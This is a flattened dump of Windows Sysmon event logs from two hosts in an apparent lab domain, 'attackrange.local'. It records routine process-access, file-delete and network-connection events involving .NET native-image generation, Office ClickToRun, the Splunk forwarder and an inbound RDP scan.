14:57:33.796{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-E00C-00000000BB01}6784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.796{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-E00C-00000000BB01}6784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.717{A7A01FEF-B626-607E-1400-00000000BB01}12762020C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.655{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-DF0C-00000000BB01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.639{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-DF0C-00000000BB01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.639{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-DF0C-00000000BB01}5568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000074959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.639{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\Temp\WIN-DC-339-20210420-1457b.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.608{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.608{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-DE0C-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.592{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeMD5=E6F107D6EEC45D320E5401C649303837,SHA256=59DA43A09AF9FD6EAAD6E02D5C838AF62D1DD5E01A892E380C92D70B793D1B34,IMPHASH=E8BEA05A14048595A134B0431534A6DFfalsefalse - rename failed with status 0xc0000022 10341000x800000000000000074955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.592{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-DE0C-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.592{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-DE0C-00000000BB01}5000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.545{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-DD0C-00000000BB01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.530{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-DD0C-00000000BB01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.530{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-DD0C-00000000BB01}5384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.436{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDD-607E-DC0C-00000000BB01}5804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.421{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBDD-607E-DC0C-00000000BB01}5804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.421{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDD-607E-DC0C-00000000BB01}5804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.217{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.217{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.108{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=25901907E720A94C1DD31F6C7155E8DC,SHA256=9758C98471D42B6BBD71DF21148A30F1275C2D14AC29AD39F6A06FA027679159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000074944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.108{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=215DB6C3D0E51C230238A975A5DAD06D,SHA256=D2BE8F8C32346F505261FC92D07EAAC3B9765F2468FCF7A4489ABB31586C9FAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050286Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:33.583{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8C2562944ACA4CC89C06FF355D570F3,SHA256=1BF515C6BC21BF2494A6B68D95E4CC8B8C5D11E25EA5B39A6E415E29D5B32185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050285Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:33.286{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5066DD10F39907B475DA83372014653F,SHA256=98FC712E87523E78CB78B83827CBE062E1DD055E02DA2F6B21FC3D016DC3EDBD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050284Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:30.800{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52525-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050283Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:30.557{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63366-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000075047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xmlMD5=374F04F0176CE2F581DDD908AD10AC90,SHA256=6600705001263D5DFA2F2CFE3A5E1B0B7D9E31B512E88C6240FA2F1ED0867636,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:34.686{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDE-607E-EC0C-00000000BB01}5064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 